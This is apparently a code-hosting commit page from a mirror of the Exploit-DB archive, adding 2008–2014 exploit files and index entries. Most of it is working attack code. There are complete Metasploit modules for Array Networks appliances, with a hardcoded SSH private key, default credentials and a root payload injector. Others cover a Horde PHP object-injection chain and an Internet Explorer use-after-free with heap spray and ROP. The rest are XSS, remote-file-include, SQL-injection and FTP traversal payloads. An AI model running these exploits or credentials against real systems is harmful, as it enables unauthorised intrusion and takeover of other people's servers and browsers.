bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 03_24_2014

Browse source
This commit is contained in:
Offensive Security 2014-03-24 04:32:40 +00:00
parent 2d7502a652
commit 9a08d1bcc1
20 changed files with 31253 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

19
files.csv
View file

@ -29203,3 +29203,22 @@ id,file,description,date,author,platform,type,port
32434,platforms/php/webapps/32434.txt,"Recipe Script 'search.php' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0
32435,platforms/windows/dos/32435.c,"Immunity Debugger 1.85 - Stack Overflow Vulnerabil?ity (PoC)",2014-03-22,"Veysel HATAS",windows,dos,0
32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0
32438,platforms/windows/remote/32438.rb,"MS14-012 Internet Explorer TextRange Use-After-Free",2014-03-22,metasploit,windows,remote,0
32439,platforms/php/remote/32439.rb,"Horde Framework Unserialize PHP Code Execution",2014-03-22,metasploit,php,remote,80
32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG Private Key Privelege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22
32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 Cookie Authentication Bypass Vulnerability",2008-09-29,Crackers_Child,php,webapps,0
32442,platforms/windows/remote/32442.c,"Nokia PC Suite <= 7.0 Remote Buffer Overflow Vulnerability",2008-09-29,Ciph3r,windows,remote,0
32443,platforms/php/webapps/32443.txt,"CAcert 'analyse.php' Cross Site Scripting Vulnerability",2008-09-29,"Alexander Klink",php,webapps,0
32444,platforms/php/webapps/32444.txt,"WordPress MU 1.2/1.3 'wp-admin/wpmu-blogs.php' Multiple Cross Site Scripting Vulnerabilities",2008-09-29,"Juan Galiana Lara",php,webapps,0
32445,platforms/linux/remote/32445.txt,"MySQL 5 Command Line Client HTML Special Characters HTML Injection Vulnerability",2008-09-30,"Thomas Henlich",linux,remote,0
32446,platforms/linux/local/32446.txt,"Xen 3.3 XenStore Domain Configuration Data Unsafe Storage Vulnerability",2008-09-30,"Pascal Bouchareine",linux,local,0
32447,platforms/php/webapps/32447.txt,"A4Desk Event Calendar 'v' Parameter Remote File Include Vulnerability",2008-09-30,Lo$er,php,webapps,0
32448,platforms/java/webapps/32448.txt,"Celoxis Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,teuquooch1seero,java,webapps,0
32449,platforms/php/webapps/32449.txt,"H-Sphere WebShell 4.3.10 'actions.php' Multiple Cross Site Scripting Vulnerabilities",2008-10-01,C1c4Tr1Z,php,webapps,0
32450,platforms/php/webapps/32450.txt,"WikyBlog 1.7.1 Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,"Omer Singer",php,webapps,0
32451,platforms/linux/dos/32451.txt,"Fedora 8/9 Linux Kernel 'utrace_control' NULL Pointer Dereference Denial of Service Vulnerability",2008-10-02,"Michael Simms",linux,dos,0
32453,platforms/php/webapps/32453.txt,"Dreamcost HostAdmin 3.1 'index.php' Cross-Site Scripting Vulnerability",2008-10-02,Am!r,php,webapps,0
32454,platforms/unix/dos/32454.xml,"libxml2 Denial of Service Vulnerability",2008-10-02,"Christian Weiske",unix,dos,0
32455,platforms/php/webapps/32455.pl,"Website Directory 'index.php' Cross-Site Scripting Vulnerability",2008-10-03,"Ghost Hacker",php,webapps,0
32456,platforms/windows/remote/32456.txt,"RhinoSoft Serv-U FTP Server 7.2.0.1 'rnto' Command Directory Traversal Vulnerability",2008-10-03,dmnt,windows,remote,0
32457,platforms/windows/remote/32457.txt,"XAMPP for Windows 1.6.8 'cds.php' SQL Injection Vulnerability",2008-10-03,"Jaykishan Nirmal",windows,remote,0

Can't render this file because it is too large.

199
platforms/hardware/remote/32440.rb Executable file
View file

@ -0,0 +1,199 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'net/ssh'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "Array Networks vAPV and vxAG Private Key Privelege Escalation Code Execution",
'Description' => %q{
This module exploits a default hardcoded private SSH key or default hardcoded
login and password in the vAPV 8.3.2.17 and vxAG 9.2.0.34 appliances made
by Array Networks. After logged in as the unprivileged user, it's possible to
modify the world writable file /ca/bin/monitor.sh with our arbitrary code.
Execution of the arbitrary code is possible by using the backend tool, running
setuid, to turn the debug monitoring on. This makes it possible to trigger our
payload with root privileges.
},
'License' => MSF_LICENSE,
'Author' =>
[
'xistence <xistence[at]0x90.nl>', # Original discovery and Metasploit module
],
'References' =>
[
['OSVDB', '104652'],
['OSVDB', '104653'],
['OSVDB', '104654'],
['URL', 'http://packetstormsecurity.com/files/125761/Array-Networks-vxAG-xAPV-Privilege-Escalation.html']
],
'DefaultOptions' =>
{
'ExitFunction' => "none"
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet',
}
},
'Targets' =>
[
['vAPV 8.3.2.17 / vxAG 9.2.0.34', {}],
],
'Privileged' => true,
'DisclosureDate' => "Feb 03 2014",
'DefaultTarget' => 0))
register_options(
[
Opt::RHOST(),
Opt::RPORT(22),
OptBool.new('SSHKEY', [ true, 'Use SSH key instead of password', true]),
OptString.new('USER', [ true, 'vAPV/vxAG SSH user', 'sync']),
OptString.new('PASS', [ true, 'vAPV/vxAG SSH password', 'click1'])
], self.class
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
def login_key(user)
print_status("#{rhost}:#{rport} - Attempt to login with '#{user}:SSH PRIVATE KEY'")
key_data = "-----BEGIN DSA PRIVATE KEY-----\n"
key_data += "MIIBugIBAAKBgQCUw7F/vKJT2Xsq+fIPVxNC/Dyk+dN9DWQT5RO56eIQasd+h6Fm\n"
key_data += "q1qtQrJ/DOe3VjfUrSm7NN5NoIGOrGCSuQFthFmq+9Lpt6WIykB4mau5iE5orbKM\n"
key_data += "xTfyu8LtntoikYKrlMB+UrmKDidvZ+7oWiC14imT+Px/3Q7naj0UmOrSTwIVAO25\n"
key_data += "Yf3SYNtTYv8yzaV+X9yNr/AfAoGADAcEh2bdsrDhwhXtVi1L3cFQx1KpN0B07JLr\n"
key_data += "gJzJcDLUrwmlMUmrXR2obDGfVQh46EFMeo/k3IESw2zJUS58FJW+sKZ4noSwRZPq\n"
key_data += "mpBnERKpLOTcWMxUyV8ETsz+9oz71YEMjmR1qvNYAopXf5Yy+4Zq3bgqmMMQyM+K\n"
key_data += "O1PdlCkCgYBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQ\n"
key_data += "OC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb\n"
key_data += "+0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBgIUZoXsJnzs\n"
key_data += "+sqSEhA35Le2kC4Y1/A=\n"
key_data += "-----END DSA PRIVATE KEY-----\n"
opts = {
#:auth_methods => ['password', 'keyboard-interactive'],
:auth_methods => ['publickey'],
:msframework => framework,
:msfmodule => self,
:port => rport,
:disable_agent => true,
:config => true,
:key_data => key_data,
#:password => pass,
:record_auth_info => true,
:proxies => datastore['Proxies']
}
opts
end
def login_user_pass(user, pass)
print_status("#{rhost}:#{rport} - Attempt to login with '#{user}:#{pass}'")
opts = {
:auth_methods => ['password', 'keyboard-interactive'],
:msframework => framework,
:msfmodule => self,
:port => rport,
:disable_agent => true,
:config => true,
:password => pass,
:record_auth_info => true,
:proxies => datastore['Proxies']
}
opts
end
def build_command
mon_temp = rand_text_alphanumeric(10)
cmd = Rex::Text.encode_base64("nohup " + payload.encoded)
# Turn debug monitoring off, just in case it's turned on
command = '/ca/bin/backend -c "debug monitor off"`echo -e "\0374"`;'
# Copy the data from monitor.sh to a random tmp file
command += "cat /ca/bin/monitor.sh > /tmp/#{mon_temp};"
# Insert our base64 encoded payload in to the world writable /ca/bin/monitor.sh file
command += "/usr/bin/perl -MMIME::Base64 -le 'print decode_base64(\"#{cmd}\")' > /ca/bin/monitor.sh;"
# Turn debug monitoring on, which will start the monitor.sh and thus our payload
command += '/ca/bin/backend -c "debug monitor on"`echo -e "\0374"`;'
# Copy monitor.sh data back
command += "cat /tmp/#{mon_temp} > /ca/bin/monitor.sh"
command
end
#def execute_command(cmd, opts)
def exploit
user = datastore['USER']
pass = datastore['PASS']
if datastore['SSHKEY']
opts = login_key(user)
else
opts = login_user_pass(user, pass)
end
opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
begin
ssh = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh = Net::SSH.start(rhost, user, opts)
end
rescue Rex::ConnectionError, Rex::AddressInUse
fail_with(Failure::Unreachable, "#{rhost}:#{rport} SSH - Connection error or address in use")
rescue Net::SSH::Disconnect, ::EOFError
fail_with(Failure::Disconnected, "#{rhost}:#{rport} SSH - Disconnected during negotiation")
rescue ::Timeout::Error
fail_with(Failure::TimeoutExpired, "#{rhost}:#{rport} SSH - Timed out during negotiation")
rescue Net::SSH::AuthenticationFailed
fail_with(Failure::NoAccess, "#{rhost}:#{rport} SSH - Failed authentication")
rescue Net::SSH::Exception => e
fail_with(Failure::Unknown, "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}")
end
fail_with(Failure::Unknown, "#{rhost}:#{rport} SSH session couldn't be established") unless ssh
if datastore['SSHKEY']
print_good("#{rhost}:#{rport} - Login Successful with '#{user}:SSH PRIVATE KEY'")
else
print_good("#{rhost}:#{rport} - Login Successful with '#{user}:#{pass}'")
end
# Make the SSH connection and execute our commands + payload
print_status("#{rhost}:#{rport} - Sending and executing payload to gain root privileges!")
Net::SSH::CommandStream.new(ssh, build_command, true)
end
end

7
platforms/java/webapps/32448.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31514/info
Celoxis is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/psa/user.do?bxn=umyhome&message=XSS+goes+here+%3cscript%3ealert('XSS')%3c/script%3e

16
platforms/linux/dos/32451.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/31536/info
Fedora 8 and 9 Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.
Note that this issue does not affect upstream kernel versions. Only the following Fedora distributions are affected:
Fedora 8 prior to kernel-2.6.26.5-28
Fedora 9 prior to kernel-2.6.26.5-45
An attacker can exploit this issue with readily available tools.
The following 'gdb' command is sufficient to trigger a kernel crash:
gdb any_executable 1

10
platforms/linux/local/32446.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/31499/info
Xen is prone to a vulnerability that results in configuration information being stored in a location that is writable by guest domains.
UPDATE (December 19, 2008): The initial proposed patches did not resolve this issue.
Xen 3.3 is vulnerable; other versions may also be affected.
#yum install xen
# xenstore-write /local/domain/GUEST-DOMID/console/tty /i/am/the/evil/guest

7
platforms/linux/remote/32445.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31486/info
MySQL is prone to an HTML-injection vulnerability because the application's command-line client fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
$ mysql --html --execute "select &#039;<a>&#039;" ... <TABLE BORDER=1><TR><TH><a></TH></TR><TR><TD><a></TD></TR></TABLE>

144
platforms/php/remote/32439.rb Executable file
View file

@ -0,0 +1,144 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Horde Framework Unserialize PHP Code Execution',
'Description' => %q{
This module exploits a php unserialize() vulnerability in Horde <= 5.1.1 which could be
abused to allow unauthenticated users to execute arbitrary code with the permissions of
the web server. The dangerous unserialize() exists in the 'lib/Horde/Variables.php' file.
The exploit abuses the __destruct() method from the Horde_Kolab_Server_Decorator_Clean
class to reach a dangerous call_user_func() call in the Horde_Prefs class.
},
'Author' =>
[
'EgiX', # Exploitation technique and Vulnerability discovery (originally reported by the vendor)
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-1691' ],
[ 'URL', 'http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection' ],
[ 'URL', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737149' ],
[ 'URL', 'https://github.com/horde/horde/commit/da6afc7e9f4e290f782eca9dbca794f772caccb3' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'DisableNops' => true
},
'Targets' => [ ['Horde 5', { }], ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 27 2013'
))
register_options(
[
OptString.new('TARGETURI', [ true, "The base path to Horde", "/horde/"])
], self.class)
end
def check
flag = rand_text_alpha(rand(10)+20)
res = send_request_exploit("print #{flag};die;")
if res and res.body and res.body.to_s =~ /#{flag}/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
print_status("#{peer} - Testing injection...")
unless check == Exploit::CheckCode::Vulnerable
fail_with(Failure::NotVulnerable, "#{peer} - Target isn't vulnerable, exiting...")
end
print_status("#{peer} - Exploiting the unserialize()...")
send_request_exploit(payload.encoded)
end
def send_request_exploit(p)
php_injection = "eval(base64_decode($_SERVER[HTTP_CMD]));die();"
payload_serialized = "O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";"
payload_serialized << "O:20:\"Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";"
payload_serialized << "a:2:{i:0;O:12:\"Horde_Config\":1:{s:13:\"\x00*\x00_oldConfig\";s:#{php_injection.length}:\"#{php_injection}\";}i:1;s:13:\"readXMLConfig\";}}"
payload_serialized << "s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";a:1:{i:0;i:1;}}}}"
payload_serialized << "s:13:\"\x00*\x00_prefnames\";a:1:{s:10:\"identities\";i:0;}}s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}"
send_request_cgi(
{
'uri' => normalize_uri(target_uri.path.to_s, "login.php"),
'method' => 'POST',
'vars_post' => {
'_formvars' => payload_serialized
},
'headers' => {
'Cmd' => Rex::Text.encode_base64(p)
}
})
end
end
=begin
PHP chain by EgiX: http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection
class Horde_Config
{
protected $_oldConfig = "phpinfo();die;";
}
class Horde_Prefs_Scope
{
protected $_prefs = array(1);
}
class Horde_Prefs
{
protected $_opts, $_scopes;
function __construct()
{
$this->_opts['sizecallback'] = array(new Horde_Config, 'readXMLConfig');
$this->_scopes['horde'] = new Horde_Prefs_Scope;
}
}
class Horde_Prefs_Identity
{
protected $_prefs, $_prefnames;
function __construct()
{
$this->_prefs = new Horde_Prefs;
$this->_prefnames['identities'] = 0;
}
}
class Horde_Kolab_Server_Decorator_Clean
{
private $_server, $_added = array(1);
function __construct()
{
$this->_server = new Horde_Prefs_Identity;
}
}
$popchain = serialize(new Horde_Kolab_Server_Decorator_Clean);
=end

9
platforms/php/webapps/32441.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31467/info
PHPJabbers Post Comments is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
An attacker can exploit this vulnerability to gain administrative access to the affected application; other attacks are also possible.
PHPJabbers Post Comments 3.0 is vulnerable; other versions may also be affected.
javascript:document.cookie = "PostCommentsAdmin=logged; path=/

9
platforms/php/webapps/32443.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31481/info
CAcert is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects versions of the CAcert source code released on or before September 21, 2008.
openssl req -new -x509 -subj "/CN=<\/pre><script>alert(document.cookies)<\/script><pre>"

12
platforms/php/webapps/32444.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/31482/info
WordPress MU is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to WordPress MU 2.6 are vulnerable.
http://www.example.com/path/wp-admin/wpmu-blogs.php?action=blogs&s=%27[XSS]
http://www.example.com/path/wp-admin/wpmu-blogs.php?action=blogs&ip_address=%27[XSS]

7
platforms/php/webapps/32447.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31507/info
A4Desk Event Calendar is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/[path]/index.php?date=&v=http://www.example2.com

13
platforms/php/webapps/32449.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/31524/info
H-Sphere WebShell is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
WebShell 4.3.10 is vulnerable; other versions may also be affected.
http://www.example.com/actions.php?m=dload&fn=%3Ciframe/src=javascript:alert(%27XSS%27)%3E
http://www.example.com/actions.php?m=search&start=1 [POST data: fld=%2F&mask=%3Ciframe%2Fsrc%3Djavascript%3Aalert%280%29%3E]
http://www.example.com/actions.php?m=sysinfo&tab=1'><img/src/onerror=with(new XMLHttpRequest()){open('GET','http://www.victim.com/actions.php?m=futils&ac=mkd',true),send(null),onreadystatechange=function(){if(readyState==4 && status==200){with(window.open('','_blank')){document.write(responseText.replace(/<\/body>/,'<script>document.getElementsByTagName("input")[2].value="XSS";document.forms[0].submit();<\/script></body>'));document.close();}}};}

13
platforms/php/webapps/32450.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/31525/info
WikyBlog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
WikyBlog 1.7.1 is vulnerable; other versions may also be affected.
http://www.example.com/index.php/Special/Main/keywordSearch?key="><iframe src="http://www.example2.com"></iframe>
http://www.example.com/index.php/Edit/Main/Home?cmd=show&revNum=65"><iframe src="http://www.example2.com"></iframe>
http://www.example.com/index.php/Special/Main/WhatLinksHere?to="><iframe src="http://www.example2.com"></iframe>
http://www.example.com/index.php/Special/Main/UserEdits?user="><iframe src="http://www.example2.com"></iframe>
http://www.example.com/index.php/"><iframe src="http://www.example2.com"></iframe>

9
platforms/php/webapps/32453.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31538/info
Dreamcost HostAdmin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
HostAdmin 3.1.1 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/index.php?page=[XSS]

57
platforms/php/webapps/32455.pl Executable file
View file

@ -0,0 +1,57 @@
source: http://www.securityfocus.com/bid/31562/info
Website Directory is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
#!/usr/bin/perl
##################################
# Coded And Found by Ghost Hacker #
# Home www.Real-h.com #
# Email Ghost-r00t[at]hotmail[dot]com #
##################################
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
print "\t\t########################################################\n\n";
print "\t\t# Website Directory - XSS Exploit #\n\n";
print "\t\t# by Ghost Hacker [Real-h.com] #\n\n";
print "\t\t# Dork : Powered by MaxiScript.com #\n\n";
print "\t\t########################################################\n\n";
if (!$ARGV[0])
{
print " Author : Ghost Hacker\n";
print " Home : www.Real-h.com\n";
print " Email : Ghost-r00t[at]Hotmail[dot]com\n";
print " Download : http://www.maxiscript.com/websitedirectory.php\n";
print " Usage : perl Ghost.pl [Host]\n";
print " Example : perl Ghost.pl http://Real-h.com/path/\n";
}
else
{
$web=$ARGV[0];
chomp $web;
$iny="index.php?keyword=Xss_Hacking&action=search";
my $web1=$web.$iny;
print "$web1\n\n";
my $ua = LWP::UserAgent->new;
my $req=HTTP::Request->new(GET=>$web1);
$doc = $ua->request($req)->as_string;
if ($doc=~ /^root/moxis ){
print "Web is vuln\n";
}
else
{
print "Web is not vuln\n";
}
}

15
platforms/unix/dos/32454.xml Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/31555/info
The libxml2 library is prone to a denial-of-service vulnerability caused by an error when handling files using entities in entity definitions.
An attacker can exploit this issue to cause the library to consume an excessive amount of memory, denying service to legitimate users.
The issue affects libxml2 2.7 prior to 2.7.2.
XML file:
<?xml version='1.0' ?>
<!DOCTYPE test [
<!ENTITY ampproblem '&amp;'>
]>
<t a="&ampproblem;">a</t>

154
platforms/windows/remote/32438.rb Executable file
View file

@ -0,0 +1,154 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => "MS14-012 Internet Explorer TextRange Use-After-Free",
'Description' => %q{
This module exploits a use-after-free vulnerability found in Internet Explorer. The flaw
was most likely introduced back in 2013, therefore only certain builds of MSHTML are
affected. In our testing with IE9, these vulnerable builds appear to be between
9.0.8112.16496 and 9.0.8112.16533, which implies August 2013 until early March 2014
(before the patch).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jason Kratzer', # Original discovery
'sinn3r' # Port
],
'References' =>
[
[ 'CVE', '2014-0307' ],
[ 'MSB', 'MS14-012' ]
],
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script/i,
:os_name => OperatingSystems::WINDOWS,
:ua_name => HttpClients::IE,
:office => "2010"
#:ua_ver => '9.0' # Some fingerprinting issue w/ os_detect, disabled for now
},
'Targets' =>
[
[
'Automatic',
{
# mov eax,dword ptr [edx+0C4h]; call eax
'Pivot' => 0x0c0d1020 # ECX
}
]
],
'Payload' =>
{
'BadChars' => "\x00",
'PrependEncoder' => "\x81\xc4\x0c\xfe\xff\xff" # add esp, -500
},
'DefaultOptions' =>
{
'Retries' => false, # You're too kind, tab recovery, I only need 1 shell.
'InitialAutoRunScript' => 'migrate -f'
},
'DisclosureDate' => "Mar 11 2014", # Vuln was found in 2013. Mar 11 = Patch tuesday
'DefaultTarget' => 0))
end
# hxds.dll
def get_payload
setup =
[
0x51C3B376, # rop nop
0x51C2046E, # pop edi; ret
0x51BE4A41, # xchg eax, esp; ret
].pack("V*")
# rop nops
45.times { setup << [0x51C3B376].pack('V*') }
setup << [
0x51C2046E, # pop edi ; ret
0x51BD28D4 # mov eax, [ecx], call [eax+8]
].pack('V*')
p = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>setup})
Rex::Text.to_unescape(p)
end
def exploit_html
template = %Q|<!DOCTYPE html>
<html>
<head>
<meta http-equiv='Cache-Control' content='no-cache'/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" >
<script>
<%=js_property_spray%>
sprayHeap({shellcode:unescape("<%=get_payload%>")});
function hxds() {
try {
location.href = 'ms-help:';
} catch(e) {}
}
function strike() {
hxds();
var fake = "";
for (var i = 0; i < 12; i++) {
if (i==0) {
fake += unescape("<%=Rex::Text.to_unescape([target['Pivot']].pack('V*'))%>");
}
else {
fake += "\\u4141\\u4141";
}
}
var elements = [
'FOOTER', 'VIDEO', 'HTML', 'DIV', 'WBR', 'THEAD', 'PARAM', 'SECTION', 'IMG',
'TIME', 'ASISE', 'CANVAS', 'P', 'RT', 'FRAMESET', 'TRACK', 'CAPTION'
];
for (var i = 0; i < elements.length; i++) {
var element = document.createElement(elements[i]);
document.body.appendChild(element);
}
var tRange = document.body.createTextRange();
tRange.moveToElementText(document.body.children[16]);
tRange.execCommand('InsertInputSubmit', true, null);
tRange.moveToElementText(document.body.children[0]);
tRange.moveEnd('character',4);
tRange.execCommand('InsertOrderedList', true, null);
tRange.select();
tRange.moveToElementText(document.body.children[0]);
tRange.moveEnd('character',13);
tRange.execCommand('Underline', true, null);
tRange.execCommand('RemoveFormat', true, null);
var fillObject = document.createElement('button');
fillObject.className = fake;
}
</script>
</head>
<body onload='strike();'></body>
</html>
|
return template, binding()
end
def on_request_exploit(cli, request, target_info)
send_exploit_html(cli, exploit_html)
end
end

30527
platforms/windows/remote/32442.c Executable file
View file

File diff suppressed because it is too large Load diff

17
platforms/windows/remote/32456.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/31563/info
RhinoSoft Serv-U FTP server is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue allows an attacker to write arbitrary files to locations outside of the application's current directory. This could help the attacker launch further attacks.
Serv-U FTP server 7.2.0.1 is vulnerable; other versions may also be affected.
220 Serv-U FTP Server v7.2 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
rnfr any_exist_file.ext
350 File or directory exists, ready for destination name.
rnto ..\..\..\boot.ini
250 RNTO command successful.

9
platforms/windows/remote/32457.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31564/info
XAMPP for Windows is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
XAMPP 1.6.8 for Windows is vulnerable; other versions may also be affected.
http://www.example.com/xampp/cds.php?action=del&id=1 or 1